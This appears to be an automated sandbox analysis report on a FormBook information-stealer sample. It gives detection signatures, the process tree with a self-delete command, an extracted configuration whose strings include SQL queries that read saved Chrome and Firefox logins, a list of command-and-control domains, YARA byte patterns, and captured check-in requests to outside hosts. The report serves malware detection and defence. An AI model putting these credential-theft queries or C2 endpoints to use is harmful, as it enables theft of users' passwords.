Loading ...

Play interactive tourEdit tour

Analysis Report zHgm9k7WYU.exe

Overview

General Information

Sample Name:zHgm9k7WYU.exe
Analysis ID:339322
MD5:d97a26894ec19dc562eec833ccb5607f
SHA1:5aa0632c496d7e1441eef50c61c6a97c5adee565
SHA256:2fdfbfc735f43a4e2dce0c849b41ab83dd17228f6df983f7a95d6e427cdc77b0
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • zHgm9k7WYU.exe (PID: 1928 cmdline: 'C:\Users\user\Desktop\zHgm9k7WYU.exe' MD5: D97A26894EC19DC562EEC833CCB5607F)
    • zHgm9k7WYU.exe (PID: 360 cmdline: {path} MD5: D97A26894EC19DC562EEC833CCB5607F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 1688 cmdline: /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d570", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d66e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9b9701d9", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "tknbr.com", "loyaloneconstruction.com", "what-where.com", "matebacapital.com", "marriedandmore.com", "qiemfsolutions.com", "graececonsulting.com", "www7456.com", "littlefreecherokeelibrary.com", "tailgatepawkinglot.com", "musheet.com", "tesfamariamtb.com", "1728025.com", "xceltechuae.com", "harperandchloe.com", "thepamperedbarber.com", "5050alberta.com", "supplychainstrainer.com", "lacorte.group", "ringingbear.com", "dwerux.com", "localeastbay.com", "zhongyier.com", "liamascia.com", "bigdudedesign.com", "agilearccreations.com", "clxkxmk.com", "articlesforthehome.com", "prestiticadalanu.com", "mayanroofingsystems.com", "homeherbgardener.com", "ricardoinman.com", "xrhaoqilai180.xyz", "queromake.com", "holywaterfoundation.com", "modacicekevi.com", "beardeco.com", "universityhysteria.com", "lastguytogetcorona.com", "winton.school", "sanborns.xyz", "bbluebay3dwdshop.com", "mateingseason.com", "oro-iptv.com", "pdlywh.com", "fallgus.com", "dezignercloset.com", "dasarelektronika.info", "cyberparkplace.com", "serenshiningarts.com", "edgecase.pro", "binhminhgarrden.net", "fansofads.com", "fortykorp.com", "shastaestatesseniorliving.com", "raksrecording.com", "mack-soldenfx.com", "freisaq.com", "sesaassociates.com", "calerconsult.com", "sarahpyle.xyz", "threepeninsulas.com", "proficienthomesalesandloans.com", "floridasoapwork.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theatomicshots.com/xle/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.zHgm9k7WYU.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.zHgm9k7WYU.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.zHgm9k7WYU.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        1.2.zHgm9k7WYU.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.zHgm9k7WYU.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d570", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d66e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9b9701d9", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: zHgm9k7WYU.exeJoe Sandbox ML: detected
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.zHgm9k7WYU.exe.5b0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeUnpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack
          Source: zHgm9k7WYU.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: zHgm9k7WYU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
          Source: Binary string: explorer.pdb source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_057EA5DC
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_057ECDF8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_057ECDF8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_057EA5D0
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_057ED118
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_057ED118
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_057ED10F
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_057ED10F
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then xor edx, edx0_2_057ED050
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then xor edx, edx0_2_057ED047
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_057ECDEC
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_057ECDEC
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_057ECC7F
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 4x nop then pop ebx1_2_00407B07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx7_2_010A7B07

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1Host: www.ricardoinman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.www7456.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1Host: www.theatomicshots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.fallgus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1Host: www.bigdudedesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewIP Address: 198.49.23.144 198.49.23.144
          Source: Joe Sandbox ViewIP Address: 198.49.23.144 198.49.23.144
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: C:\Windows\explorer.exeCode function: 2_2_074BC782 getaddrinfo,setsockopt,recv,2_2_074BC782
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1Host: www.ricardoinman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.www7456.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1Host: www.theatomicshots.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1Host: www.fallgus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1Host: www.bigdudedesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ricardoinman.com
